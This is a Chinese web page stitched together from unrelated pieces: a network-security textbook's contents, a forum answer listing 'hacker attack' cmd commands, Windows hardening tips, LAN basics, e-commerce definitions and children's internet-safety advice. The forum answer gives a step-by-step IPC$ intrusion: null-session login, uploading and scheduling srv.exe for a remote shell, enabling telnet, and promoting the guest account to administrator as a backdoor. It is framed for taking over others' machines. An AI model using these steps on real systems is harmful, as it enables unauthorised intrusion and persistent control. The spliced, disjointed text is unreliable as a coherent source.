涉及的內容:
第1章 計算機網路安全概述 1
1.1 計算機網路安全的基本概念 1
1.1.1 網路安全的定義 1
1.1.2 網路安全的特性 2
1.2 計算機網路安全的威脅 3
1.2.1 網路安全威脅的分類 3
1.2.2 計算機病毒的威脅 3
1.2.3 木馬程序的威脅 4
1.2.4 網路監聽 4
1.2.5 黑客攻擊 4
1.2.6 惡意程序攻擊 4
1.3 網路安全威脅產生的根源 5
1.3.1 系統及程序漏洞 5
1.3.2 網路安全防護所需設施
存在的問題 8
1.3.3 安全防護知識方面存在的問題 9
1.4 網路安全策略 9
1.4.1 網路安全策略設計的原則 9
1.4.2 幾種網路安全策略 10
1.5 計算機網路安全的現狀與發展 11
1.5.1 計算機網路安全的現狀 11
1.5.2 計算機網路安全的發展方向 12
1.6 小結與練習 13
1.6.1 小結 13
1.6.2 練習 13
第2章 網路安全體系結構及協議 14
2.1 計算機網路協議概述 14
2.1.1 網路協議 14
2.1.2 協議簇和行業標准 14
2.1.3 協議的交互 15
2.1.4 技術無關協議 15
2.2 OSI參考模型及其安全體系 16
2.2.1 計算機網路體系結構 16
2.2.2 OSI參考模型簡介 16
2.2.3 ISO/OSI安全體系 17
2.3 TCP/IP參考模型及其安全體系 20
2.3.1 TCP/IP參考模型 20
2.3.2 TCP/IP參考模型的安全體系 21
2.4 常用網路協議和服務 24
2.4.1 常用網路協議 24
2.4.2 常用網路服務 27
2.5 Windows常用的網路命令 28
2.5.1 ping命令 28
2.5.2 at命令 30
2.5.3 netstat命令 31
2.5.4 tracert命令 32
2.5.5 net命令 32
2.5.6 ftp命令 34
2.5.7 nbtstat命令 35
2.5.8 telnet命令 36
2.6 協議分析工具-Sniffer的應用 36
2.6.1 Sniffer的啟動和設置 37
2.6.2 解碼分析 40
2.7 實訓項目 42
2.8 小結與練習 43
2.8.1 小結 43
2.8.2 練習 43
第3章 計算機病毒與木馬 44
3.1 計算機病毒概述 44
3.1.1 計算機病毒的定義 44
3.1.2 計算機病毒的演變史 44
3.1.3 計算機病毒的特性 46
3.2 計算機病毒及其分類、
傳播途徑 46
3.2.1 常見計算機病毒 46
3.2.2 計算機病毒的分類 47
3.2.3 計算機病毒的傳播途徑 48
3.3 計算機病毒的檢測和防禦 49
3.3.1 普通計算機病毒的檢測與防禦 49
3.3.2 U盤病毒的檢測與防禦 54
3.3.3 ARP病毒的檢測與防禦 57
3.3.4 蠕蟲病毒的檢測與防禦 59
3.4 計算機木馬概述 64
3.4.1 計算機木馬的定義 65
3.4.2 計算機木馬的類型及基本功能 65
3.4.3 計算機木馬的工作原理 66
3.5 計算機木馬的檢測與防禦 66
3.5.1 普通計算機木馬的檢測與防禦 66
3.5.2 典型計算機木馬的手動清除 70
3.6 實訓項目 74
3.7 小結與練習 74
3.7.1 小結 74
3.7.2 練習 75
第4章 加密與數字簽名 76
4.1 加密技術 76
4.1.1 加密技術概述 76
4.1.2 數據加密常見方式 77
4.2 加密演算法 80
4.2.1 古典加密演算法 80
4.2.2 現代加密演算法 82
4.3 數字簽名技術 84
4.3.1 數字簽名技術概述 84
4.3.2 數字簽名技術的工作原理 85
4.3.3 數字簽名技術的演算法 86
4.4 PKI技術 86
4.4.1 PKI概述 86
4.4.2 PKI技術原理 86
4.4.3 證書頒發機構 87
4.4.4 數字證書 88
4.5 PGP原理及應用 89
4.5.1 PGP概述 89
4.5.2 PGP密鑰的創建 89
4.5.3 PGP文件加密和解密 93
4.5.4 PGP密鑰導出與導入 94
4.5.5 PGP電子郵件加、解密和
簽名驗證 95
4.5.6 PGP數字簽名 97
4.6 EFS原理及應用 98
4.6.1 EFS概述 98
4.6.2 EFS的加密和解密 98
4.6.3 EFS的其他應用 101
4.7 SSL安全傳輸及應用 104
4.7.1 SSL概述 104
4.7.2 SSL的工作原理 105
4.7.3 安裝證書服務 105
4.7.4 申請證書 107
4.7.5 頒發Web伺服器證書 110
4.7.6 安裝伺服器證書 111
4.7.7 Web伺服器的SSL設置 112
4.7.8 瀏覽器的SSL設置 113
4.7.9 訪問SSL站點 115
4.8 實訓項目 115
4.9 小結與練習 118
4.9.1 小結 118
4.9.2 練習 118
第5章 防火牆技術 119
5.1 防火牆概述 119
5.1.1 防火牆的基本准則 119
5.1.2 防火牆的主要功能特性 120
5.1.3 防火牆的局限性 120
5.2 防火牆的實現技術 120
5.2.1 數據包過濾 120
5.2.2 應用層代理 121
5.2.3 狀態檢測技術 122
5.3 防火牆的體系結構 122
5.3.1 雙宿/多宿主機模式 122
5.3.2 屏蔽主機模式 123
5.3.3 屏蔽子網模式 123
5.4 防火牆的工作模式 124
5.5 防火牆的實施方式 126
5.5.1 基於單個主機的防火牆 126
5.5.2 基於網路主機的防火牆 126
5.5.3 硬體防火牆 126
5.6 瑞星個人防火牆的應用 127
5.6.1 界面與功能布局 127
5.6.2 常用功能 128
5.6.3 網路監控 130
5.6.4 訪問控制 134
5.6.5 高級設置 137
5.7 ISA Server 2004配置 138
5.7.1 ISA Server 2004概述 138
5.7.2 ISA Server 2004的安裝 139
5.7.3 ISA Server 2004防火牆策略 142
5.7.4 發布內部網路中的伺服器 147
5.7.5 ISA Server 2004的系統和
網路監控及報告 152
5.8 iptables防火牆 155
5.8.1 iptables中的規則表 156
5.8.2 iptables命令簡介 156
5.8.3 Linux防火牆配置 158
5.9 PIX防火牆配置 161
5.9.1 PIX的基本配置命令 162
5.9.2 PIX防火牆配置實例 166
5.10 實訓項目 167
5.11 小結與練習 170
5.11.1 小結 170
5.11.2 練習 170
第6章 Windows Server 2003的
網路安全 171
6.1 Windows Server 2003的
安全簡介 171
6.1.1 用戶身份驗證 171
6.1.2 基於對象的訪問控制 172
6.2 Windows Server 2003系統安全
配置的常用方法 172
6.2.1 安裝過程 172
6.2.2 正確設置和管理賬戶 172
6.2.3 正確設置目錄和文件許可權 173
6.2.4 網路服務安全管理 173
6.2.5 關閉無用埠 174
6.2.6 本地安全策略 175
6.2.7 審核策略 179
6.2.8 Windows日誌文件的保護 180
6.3 Windows Server 2003訪問
控制技術 181
6.3.1 訪問控制技術簡介 181
6.3.2 Windows Server 2003訪問
控制的使用 181
6.4 賬戶策略 187
6.4.1 賬戶策略的配置 187
6.4.2 Kerberos策略 190
6.5 啟用安全模板 190
6.5.1 安全模板的簡介 190
6.5.2 啟用安全模板的方法 191
6.6 實訓項目 193
6.7 小結與練習 196
6.7.1 小結 196
6.7.2 練習 196
第7章 埠掃描技術 197
7.1 埠概述 197
7.1.1 TCP/IP工作原理 197
7.1.2 埠的定義 199
7.1.3 埠的分類 199
7.2 埠掃描技術 200
7.2.1 埠掃描概述 200
7.2.2 常見的埠掃描技術 201
7.3 常見掃描軟體及其應用 202
7.3.1 掃描軟體概述 202
7.3.2 SuperScan掃描工具及應用 202
7.4 埠掃描防禦技術應用 204
7.4.1 查看埠的狀態 204
7.4.2 關閉閑置和危險的埠 207
7.4.3 隱藏操作系統類型 209
7.5 實訓項目 211
7.6 小結與練習 215
7.6.1 小結 215
7.6.2 練習 215
第8章 入侵檢測系統 216
8.1 入侵檢測概述 216
8.1.1 入侵檢測的概念及功能 216
8.1.2 入侵檢測系統模型 216
8.1.3 入侵檢測工作過程 217
8.2 入侵檢測系統的分類 217
8.2.1 根據檢測對象劃分 217
8.2.2 根據檢測技術劃分 218
8.2.3 根據工作方式劃分 219
8.3 入侵檢測系統部署 219
8.3.1 基於主機的入侵
檢測系統部署 219
8.3.2 基於網路的入侵
檢測系統部署 219
8.3.3 常見入侵檢測工具及其應用 221
8.4 入侵防護系統 225
8.4.1 入侵防護系統的工作原理 226
8.4.2 入侵防護系統的優點 227
8.4.3 入侵防護系統的主要應用 228
8.5 小結與練習 228
8.5.1 小結 228
8.5.2 練習 229
第9章 無線網路安全 230
9.1 無線區域網介紹 230
9.1.1 無線區域網常用術語 230
9.1.2 無線區域網組件 231
9.1.3 無線區域網的訪問模式 232
9.1.4 覆蓋區域 233
9.2 無線網路常用標准 233
9.2.1 IEEE 802.11b 234
9.2.2 IEEE 802.11a 234
9.2.3 IEEE 802.11g 235
9.2.4 IEEE 802.11n 235
9.3 無線網路安全解決方案 236
9.3.1 無線網路訪問原理 236
9.3.2 認證 237
9.3.3 加密 238
9.3.4 入侵檢測系統 240
9.4 小結與練習 241
9.4.1 小結 241
2. 跪求cmd黑客攻擊指令和cmd電腦命令!懸賞大大滴有
一 相關命令
建立空連接:
net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)
建立非空連接:
net use \\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)
映射默認共享:
net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$
刪除一個ipc$連接
net use \\IP\ipc$ /del
刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
提示:對於不熟悉命令行操作的朋友來說.建立ipc$連接後,可以在"我的電腦"或"網上鄰居"右鍵映射網路驅動器,效果一樣.
二 經典入侵模式
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,後面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
2. C:\> srv.exe \\127.0.0.1\admin$
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什麼地方去了)。
3. C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎麼啟動啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就准備開始下面的命令。
6. C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意埠是99。Telnet默認的是23埠,但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
7.C:\> ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8. C:\WINNT\system32>ntlm
輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務!
9.Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10. C:\>net user guest /active:yes
將對方的Guest用戶激活
11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
12. C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機).
ipc$經典入侵步驟:
1、net use \\ip\ipc$ 密碼 /user:用戶名
2、 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 時間 命令
5、入侵成功,連接你的肉雞
常用的網路命令
net user 查看用戶列表
net user 用戶名 密碼 /add 添加用戶
net user 用戶名 密碼 更改用戶密碼
net localgroup administrators 用戶名 /add 添加用戶到管理組
net user 用戶名 /delete 刪除用戶
net user 用戶名 查看用戶的基本情況
net user 用戶名 /active:no 禁用該用戶
net user 用戶名 /active:yes 啟用該用戶
net share 查看計算機IPC$共享資源
net share 共享名 查看該共享的情況
net share 共享名=路徑 設置共享。例如 net share c$=c:
net share 共享名 /delete 刪除IPC$共享
net stop lanmanserver 關閉ipc$和默認共享依賴的服務
net use 查看IPC$連接情況
net use \\ip\ipc$ "密碼" /user:"用戶名" ipc$連接
net use \\ip\ipc$ /del 刪除一個連接
net use z: \\目標IP\c$ "密碼" /user:"用戶名" 將對方的c盤映射為自己的z盤
net use z: /del
net time \\ip 查看遠程計算機上的時間
路徑:\文件名 \\ip\共享名復制文件到已經ipc$連接的計算機上
net view ip 查看計算機上的共享資源
at 查看自己計算機上的計劃作業
at \\ip 查看遠程計算機上的計劃作業
at \\ip 時間 命令(注意加盤符) 在遠程計算機上加一個作業
at \\ip 計劃作業ID /delete 刪除遠程計算機上的一個計劃作業
at \\ip all /delete 刪除遠程計算機上的全部計劃作業
at \\ip time "echo 5 > c:\t.txt" 在遠程計算機上建立文本文件t.txt;
下面純手打,上面是度娘給的
taskkill /im 進程名 停止運行
tasklisy 查看運行進程
ipconfig 查看本機IP
md 創建文件夾
rd 刪除文件夾
echo off > .txt|exit 添加文本
echo 內容 >> .txt 給文本添加內容
復制文件
net user 用戶名 密碼/add 創建一個普通賬號
net localgroup administrators 用戶名 /add 把賬戶加入超級用戶組
3. 我想問一下 有關網路安全的問題 回答好了繼續加分
1、關掉危險進程
首先,我們當然要進到服務里,去看看有什麼危險的系統進程在開著啦。看到注釋嗎?「允許遠程操作注冊表」,關掉它(Remote Registry)我點的是AT命令,也要關(Task Scheler),免得被入侵者用它來啟動木馬。
打開注冊表,進入HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\Current_
Version\Winlogon在右邊找一個鍵值DontDisplayLastUserName,然後改成1,如果不存在,你就新建立一個!
2、防止IPC空連接是非常必要的!
好,我們來到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa這里,找到這個主鍵restrictanonymous把它改成1。
如果改成2有些程序可能無法運行,所以一般改成1。
3、我們來修改3389的默認埠
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp來到這里,找到PortNumber ,十進制是3389的,你隨意把它改成其它4個數字吧,我改成1314了,這樣入侵者就不能3389入侵你的電腦了。
4、進入cmd下,運行net share和net user
看看還有什麼共享的和可疑的用戶名。Administrator 和 Guest是系統默認的,不用刪,怎麼多了個×××?不理了,刪掉它。(net user ××× /del),關掉沒用的共享。(net share C$ /del, ...)。
5、輸入法漏洞
解決方案:1.對這幾個有漏洞的幫助文件進行刪除或者改名等操作。
最好就是刪除WINIME.CHM,WINPY.CHM,WINZM.CHM這三個幫助文件。你會刪其它吧?
6、最重要,也很好用,一般無敵
在cmd下,進入c:\winnt\system32寫入命令 ren net.exe netwei.exe (回車)。好了,以後,別人就算進到你的電腦內,也不能用net user username pass /add增加用戶,更不能用net localgroup administrators username /add 加入administrators了,呵呵!這個命令來建立用戶並提升管理員了。改成netwei user。
7、最後一步,也是關鍵的,這個可以防止別入格式化!
在CMD里寫入命令:C:\>DOSKEY FORMAT=Bad command or file name! (回車)這個是鎖定命令,你也可以鎖定DEL,當別人惡意格式化你的硬碟時,系統將會顯示:「Bad command or file name!,拒絕執行格式化命令。如果在某種特殊情況下,你自己需要格式化硬碟,那該怎麼辦呢?你可以輸入下面的命令:
C:\>DOSKEY FORMAT= (回車)這樣你就可以像以前一樣可以格式化了。
4. 互聯網安全小知識
1. 互聯網行業小知識簡短
互聯網行業小知識簡短 1.互聯網的知識
網路基礎知識 一、區域網的特徵: 區域網分布范圍小,投資少,配置簡單等,具有如下特徵: 1.傳輸速率高:一般為1Mbps--20Mbps,光纖高速網可達100Mbps,1000MbpS 2.支持傳輸介質種類多。
3.通信處理一般由網卡完成。 4.傳輸質量好,誤碼率低。
5.有規則的拓撲結構。 二、區域網的組成: 區域網一般由伺服器,用戶工作站,傳輸介質,聯網設備四部分組成。
1.伺服器: 運行網路0S,提供硬碟、文件數據及列印機共享等服務功能,是網路控制的核心。 從應用來說較高配置的普通486以上的兼容機都可以用於文件伺服器,但從提高網路的整體性能,尤其是從網路的系統穩定性來說,還是選用專用伺服器為宜。
目前常見的NOS主要有ware,Unix和Windows NT三種。 ware: 流行版本V3.12,V4.11,V5.0,對硬體要求低,應用環境與DOS相似,技術完善,可靠,支持多種工作站和協議,適於區域網操作系統,作為文件伺服器,列印伺服器性能好。
Unix:一種典型的32位多用戶的NOS,主要應用於超級小型機,大型機上,目前常用版本有Unix SUR4.0。支持網路文件系統服務,提供數據等應用,功能強大,不易掌握,命令復雜,由AT&T和SCO公司推出。
Windows NT Server 4.0: 一種面向分布式圖形應用程序的完整平台系統,界面與Win95相似,易於安裝和管理,且集成了Inter網路管理工具,前景廣闊。 伺服器分為文件伺服器,列印伺服器,資料庫伺服器,在Inter網上,還有Web,FTP,E—mail等伺服器。
網路0S朝著能支持多種通信協議,多種網卡和工作站的方向發展。 2.工作站:可以有自己的0S,獨立工作;通過運行工作站網路軟體,訪問Server共享資源,常見有DOS工作站,Windows95工作站。
3.網卡:將工作站式伺服器連到網路上,實現資源共享和相互通信,數據轉換和電信號匹配。 網卡(NTC)的分類: (1)速率:10Mbps,100Mbps (2)匯流排類型:ISA/PCI (3)傳輸介質介面: 單口:BNC(細纜)或RJ一45(雙絞線) 4.傳輸介質:目前常用的傳輸介質有雙絞線,嘩源同軸電纜,光纖等。
(1)雙絞線(TP): 將一對以上的雙絞線封裝在一個絕緣外套中,為了降低干擾,每對相互扭繞而成。分為非屏蔽雙絞線(UTP)和屏蔽雙絞線(STP).區域網中UTP分為3類,4類,5類和超5類四種。
以AMP公司為例: 3類:10Mbps,皮薄,皮上注「cat3',箱上注「3類」,305米/箱,400元/箱 4類:網路中用的不多 5類:(超5類)100Mbps,10Mbps,皮厚,匝密,皮上注「cat5」,箱上注5類,305米/箱,600—700元/箱(每段100米,接4個中繼器,最大500米) 接線順序: 正常: 白桔 桔 白綠 藍 白藍 綠 白棕 棕 1 2 3 4 5 6 7 8 集聯: 白綠 綠 白桔 棕 白棕 桔 白藍 藍 1 2 3 4 5 6 7 8 STP:內部與UTP相同,外包鋁箔,Apple,IBM公司網路產品要求使則襪用STP雙絞線,速率高,價格貴。 (2)同軸電纜: 由一根空心的外圓柱導體和一根位於中心軸線的內導線組成,兩導體間用絕緣材料隔開。
按直徑分為粗纜和細纜。 粗纜:亂盯態傳輸距離長,性能高但成本高,使用於大型區域網干線,連接時兩端需終接器。
A.粗纜與外部收發器相連。 B.收發器與網卡之間用AUI電纜相連。
C.網卡必須有AUI介面:每段500米,100個用戶,4個中繼器可達2500米,收發器之間最小2.5米,收發器電纜最大50米。 細纜:傳輸距離短,相對便宜,用T型頭,與BNC網卡相連,兩端安50歐終端電阻。
每段185米,4個中繼器,最大925米,每段30個用戶,T型頭之間最小0.5米。 按傳輸頻帶分為基帶和寬頻傳輸。
基帶:數字信號,信號占整個信道,同一時間內能傳送一種信號。 寬頻:傳送的是不同頻率的信號。
(3)光纖: 應用光學原理,由光發送機產生光束,將電信號變為光信號,再把光信號導入光纖,在另一端由光接收機接收光纖上傳來的光信號,並把它變為電信號,經解碼後再處理。分為單模光纖和多模光纖。
絕緣保密性好。 單模光纖:由激光作光源,僅有一條光通路,傳輸距離長,2公里以上。
多模光纖:由二極體發光,低速短距離,2公里以內。 三、計算機網路軟體體系: 四、區域網的幾種工作模式: 1.專用伺服器結構:(Server—Baseb) 又稱為「工作站/文件伺服器」結構,由若乾颱微機工作站與一台或多台文件伺服器通過通信線路連接起來組成工作站存取伺服器文件,共享存儲設備。
文件伺服器自然以共享磁碟文件為主要目的。 對於一般的數據傳遞來說已經夠用了,但是當資料庫系統和其它復雜而被不斷增加的用戶使用的應用系統到來的時候,伺服器已經不能承擔這樣的任務了,因為隨著用戶的增多,為每個用戶服務的程序也增多,每個程序都是獨立運行的大文件,給用戶感覺極慢,因此產生了客戶機/伺服器模式。
2.客戶機/伺服器模式:(client/server) 其中一台或幾台較大的計算機集中進行共享資料庫的管理和存取,稱為伺服器,而將其它的應用處理工作分散到網路中其它微機上去做,構成分布式的處理系統,伺服器控制管理數據的能力己由文件管理方式上升為資料庫管理方式,因此,C/S由的伺服器也稱為資料庫伺服器,注重於數據定義及存取安全後備及還原,並發控制及事務管。
2.最新的電商小知識 字數稍微短點
電子商務通常是指是在全球各地廣泛的商業貿易活動中,在網際網路開放的網路環境下,基於瀏覽器/伺服器應用方式,買賣雙方不謀面地進行各種商貿活動,實現消費者的網上購物、商戶之間的網上交易和在線電子支付以及各種商務活動、交易活動、金融活動和相關的綜合服務活動的一種新型的商業運營模式。
電子商務專業是融計算機科學、市場營銷學、管理學、法學和現代物流於一體的新型交叉學科。培養掌握計算機信息技術、市場營銷、國際貿易、管理、法律、會計學、和現代物流的基本理論及基礎知識,具有利用網路開展商務活動的能力和利用計算機信息技術、現代物流方法改善企業管理方法,提高企業管理水平能力的創新型復合型電子商務高級專門人才。
電子商務學習課程 基礎課程: 電子商務概論、經濟學、管理學、會計學、運籌學、統計學、英語、市場營銷學、現代企業運作、計算機基礎與應用、C語言、網路與數據通訊技術、資料庫原理與網路資料庫技術、電子商務原理。 專業課程 : 電子商務系統的分析與設計、網路營銷基礎與實踐、電子商務與國際貿易、電子商務信函寫作、電子商務營銷寫作實務、營銷策劃、網頁配色、網頁設計、Web標准與網站重構、Flash Action Script動畫設計、UI設計、Asp 電子商務網站建設、電子商務管理務實、會計電算化、photoshop、經濟法、ERP與客戶關系管理。
B2B:BusinesstoBusiness,企業與企業之間的電子商務,即企業與企業之間通過互聯網進行產品、服務及信息的交換。企業可以使用互聯網技術或各種商務網路平台對每筆交易尋找最佳合作夥伴,完成從定購到結算的全部交易行為。
B2C:BusinesstoCustomer,企業與消費者之間的電子商務,就是企業廠商直接將產品或服務推上C2C:ConsumertoConsumer,消費者與消費者之間的電子商務,C2C商務平台就是通過為買賣雙方提供一個在線互動交易平台,使賣方可以主動提供商品上網拍賣,而買方可以自行選擇商品進行競價。O2O:OnlioOffline,線下商務與互聯網之間的電子商務,實現線下服務,線上攬客的交易模式,消費者可用線上篩選服務,在線結算,該模式推廣效果可查,每筆交易可跟蹤。
3.小學生網路安全常識
1長期在電腦前工作:對皮膚不好,對視力不好,對記憶也有影響
2上網查閱信息需要注意幾點 :一個內容最好多查幾次,判斷哪個才是真正對自己有價值的
3上網交友需要特別注意不要告訴陌生人太多關於自己家庭及其相關的真實信息
4沖浪安全常識 :時間不要長,要有一定的自我見解,不可全信
5網上安全:記得打開防毒軟體,盡量不要下載一些.EXE文件,不要亂點彈出式廣告
6密碼安全常識:不可以告訴陌生人,自己一定要記住,最好不要用生日
4.怎樣文明使用網路要簡短怎麼樣文明使用網路
網路是一個前所未有的平台,它賦予我們每一個人網路話語權,它為我們創造了自由交流的空間,它是我們生活的一部分。
但是長期以來,網路並不是一個溫馨家園,造謠生事的,人身攻擊的,污言穢語的,這些不文明的行為,傷害了我們,也在誤導著我們。正因為網路自由,我們更要學會自律;正因為網路連接你我他,我們更要尊重他人。
1、尊重他人,不侮辱謾罵; 2、以禮待人,不污言穢語; 3、實事求是,不造謠誹謗; 4、提倡現代漢語,不使用方言; 5、提倡標准漢字,不使用不規範字; 6、提倡文明上網,不傳播色情暴力信息。 一、文明上網,遵守網路道德規范。
網路既是一個信息的寶庫,也是一個信息的垃圾場,包羅萬象。一些文化思想、宣傳論調,極易使青少年的人生觀價值觀產生傾斜模糊不清。
二、爭做網路安全衛士!我們要維護網路安全,不破壞網路秩序,不參與有害和無用信息的製作和傳播,不竊取他人隱私,促進網路健康發展。 網路上同樣要以誠為本,堅決不做欺詐他人等有損青少年形象的行為,要誠心交友與人為善。
三、明德自律,文明用語。科學上網,真確利用網路資源,講究用語讓網路成為展示當代青少年美好形象的載體。
四、爭做網路道德模範!我們要善於網上學習,分清善惡美醜的界限,不瀏覽不良信息;要有益身心健康,不訪問非法網站網頁,不參與網上賭博,拒絕瀏覽不良信息。 把握好上網與學習的尺度,趨利避害,爭做網路中的主人! 五、善於利用網路資源有效學習,合理使用校園網,汲取有益知識。
增強保護意識,防止網上受騙。
5. 網路安全的黑板報內容資料
計算機網路安全是指利用網路管理控制和技術措施,保證在一個網路環境里,數據的保密性、完整性及可使用性受到保護。計算機網路安全包括兩個方面,即物理安全和邏輯安全。物理安全指系統設備及相關設施受到物理保護,免於破壞、丟失等。邏輯安全包括信息的完整性、保密性和可用性。下面是我收集整理的網路安全的黑板報內容資料,歡迎大家閱讀!
網路安全的黑板報內容資料
計算機網路的脆弱性
互聯網是對全世界都開放的網路,任何單位或個人都可以在網上方便地傳輸和獲取各種信息,互聯網這種具有開放性、共享性、國際性的特點就對計算機網路安全提出了挑戰。互聯網的不安全性主要有以下幾項:
1)網路的開放性
網路的技術是全開放的,使得網路所面臨的攻擊來自多方面。或是來自物理傳輸線路的攻擊,或是來自對網路通信協議的攻擊,以及對計算機軟體、硬體的漏洞實施攻擊。
2)網路的國際性
意味著對網路的攻擊不僅是來自於本地網路的用戶,還可以是互聯網上其他國家的黑客,所以,網路的安全面臨著國際化的挑戰。
3)網路的自由性
大多數的網路對用戶的使用沒有技術上的約束,用戶可以自由的上網,發布和獲取各類信息。
防範間諜軟體之危害的對策
1、公開安裝的間諜軟體
對於那些公開安裝的間諜軟體,你無需費多大工夫去研究他,因為你可以輕而易舉的將之卸載,除此之外,你還可以知道他們的大至功能所在。換句話說,對於這些公開安裝的間諜軟體,你有很多措施保護你的隱私不受侵犯。例如,從不在辦公室計算機里檢查私有的電子郵件。公開安裝的間諜軟體一般都是合法的,他們有特定的使用人群和用途。
公司和學院:他們也許使用間諜軟體監測他們雇員的計算機和網路使用。
父母:他們也許使用間諜軟體監測家庭電腦和網路使用。防止他們的孩子受到有害信息的毒害。許多父母希望間諜軟體可能幫助他們。
政府:他們也許為公開安全或信息戰爭而使用間諜軟體監測網路。
2、秘密侵入的間諜軟體
真正的危險來自那些秘密侵入到你計算機里的間諜軟體,因為你不知道他究竟想做什麼。所有間諜軟體的安裝都利用了兩種弱點。一種是PC機的應用軟體,另一種是你自己。
由於現代計算機軟體是極端復雜的,現有的很多應用軟體和操作系統都存在各種各樣的漏洞。間諜軟體可以利用這些漏洞侵入到你的計算機。理論上你不可能防止這種侵入,當你沖浪網頁,一張小圖片可能給你帶來可怕的間諜軟體。除給你的操作系統打上必要的補丁,盡可能不去不安全或不熟悉的站點是減少這種侵入的有效方法。
很顯然,這種利用應用軟體漏洞的侵入方式需要較高的技術水平。而絕大多數間諜軟體的侵入是採用簡單的欺詐方式。例如,他們免費給你提供一個可以清除間諜軟體的軟體,而他們真正的目的是將你計算機里原有的間諜軟體去除,用他們的取而代之。
如果你習慣在網上下載免費軟體,你的計算機里可能有一大堆間諜軟體。
所以我們有兩種方法對付這些秘密侵入的間諜軟體:盡量不去不熟悉或不安全的站點,盡量不從網上下載免費軟體。
這種秘密的侵入也有他特定的用戶群和用途。論防範間諜軟體之危害。
網路安全知識資料
1.網路安全類型
運行系統安全,即保證信息處理和傳輸系統的安全。它側重於保證系統正常運行,避免因為系統的崩潰和損壞而對系統存貯、處理和傳輸的信息造成破壞和損失,避免由於電磁泄漏,產生信息泄漏,干擾他人,受他人干擾。
網路上系統信息的安全。包括用戶口令鑒別,用戶存取許可權控制,數據存取許可權、方式控制,安全審計,安全問題跟蹤,計算機病毒防溻,數據加密。
網路上信息傳播安全,即信息傳播後果的安全。包括信息過濾等。它側重於防止和控制非法、有害的信息進行傳播後的後果。避免公用網路上大量自由傳輸的信息失控。
網路上信息內容的安全。它側重於保護信息的保密性、真實性和完整性。避免攻擊者利用系統的安全漏洞進行竊聽、冒充、詐騙等有損於合法用戶的行為。本質上是保護用戶的利益和隱私。
2.網路安全特徵
網路安全應具有以下四個方面的特徵:
保密性:信息不泄漏給非授權用戶、實體或過程,或供其利用的特性。
完整性:數據未經授權不能進行改變的特性。即信息在存儲或傳輸過程中保持不被修改、不被破壞和丟失的特性。
可用性:可被授權實體訪問並按需要使用的特性。即當需要時能否存取所需的信息。例如網路環境下拒絕服務、破壞網路和有關系統的正常運行等都屬於對可用性的攻擊;
可控性:對信息的傳播及內容具有控制能力。
3.威脅網路安全因素
自然災害、意外事故;計算機犯罪; 人為行為,比如使用不當,安全意識差等;黑客「 行為:由於黑客的入侵或侵擾,比如非法訪問、拒絕服務計算機病毒、非法連接等;內部泄密;外部泄密;信息丟失;比如信息流量分析、信息竊取等; 信息戰;網路協議中的缺陷,例如TCP/IP協議的安全問題等等。
網路安全威脅主要包括兩種:滲入威脅和植入威脅
滲入威脅主要有:假冒、旁路控制、授權侵犯;
植入威脅主要有:特洛伊木馬、陷門。
陷門:把某一」特徵「設立於某個系統或系統部件之中,使得在提供特定的輸入數據時,允許安全策略被違反。
4、網路安全的結構冪次
1、物理安全
自然災害(如雷電、地震、火災等),物理損壞(如硬碟損壞、設備使用壽命到期等),設備故障(如停電、電磁干擾等),意外事故。解決方案是:防護措施,安全制度,數據備份等。
電磁泄漏,信息泄漏,干擾他人,受他人干擾,乘機而入(如進入安全進程後半途離開),痕跡泄漏(如口令密鑰等保管不善)。解決方案是:輻射防護,隱藏銷毀等。
操作失誤(如刪除文件,格式化硬碟,線路拆除等),意外疏漏。解決方案是:狀態檢測,報警確認,應急恢復等。
計算機系統機房環境的安全。特點是:可控性強,損失也大。
解決方案:加強機房管理,運行管理,安全組織和人事管理。
2 、安全控制
微機操作系統的安全控制。如用戶開機鍵入的口令(某些微機主板有「 萬能口令」),對文件的讀寫存取的控制(如Unix系統的文件控制機制)。主要用於保護存貯在硬碟上的信息和數據。
網路介面模塊的安全控制。在網路環境下對來自其他機器的網路通信進程進行安全控制。主要包括:身份認證,客戶許可權設置與判別,審計日誌等。
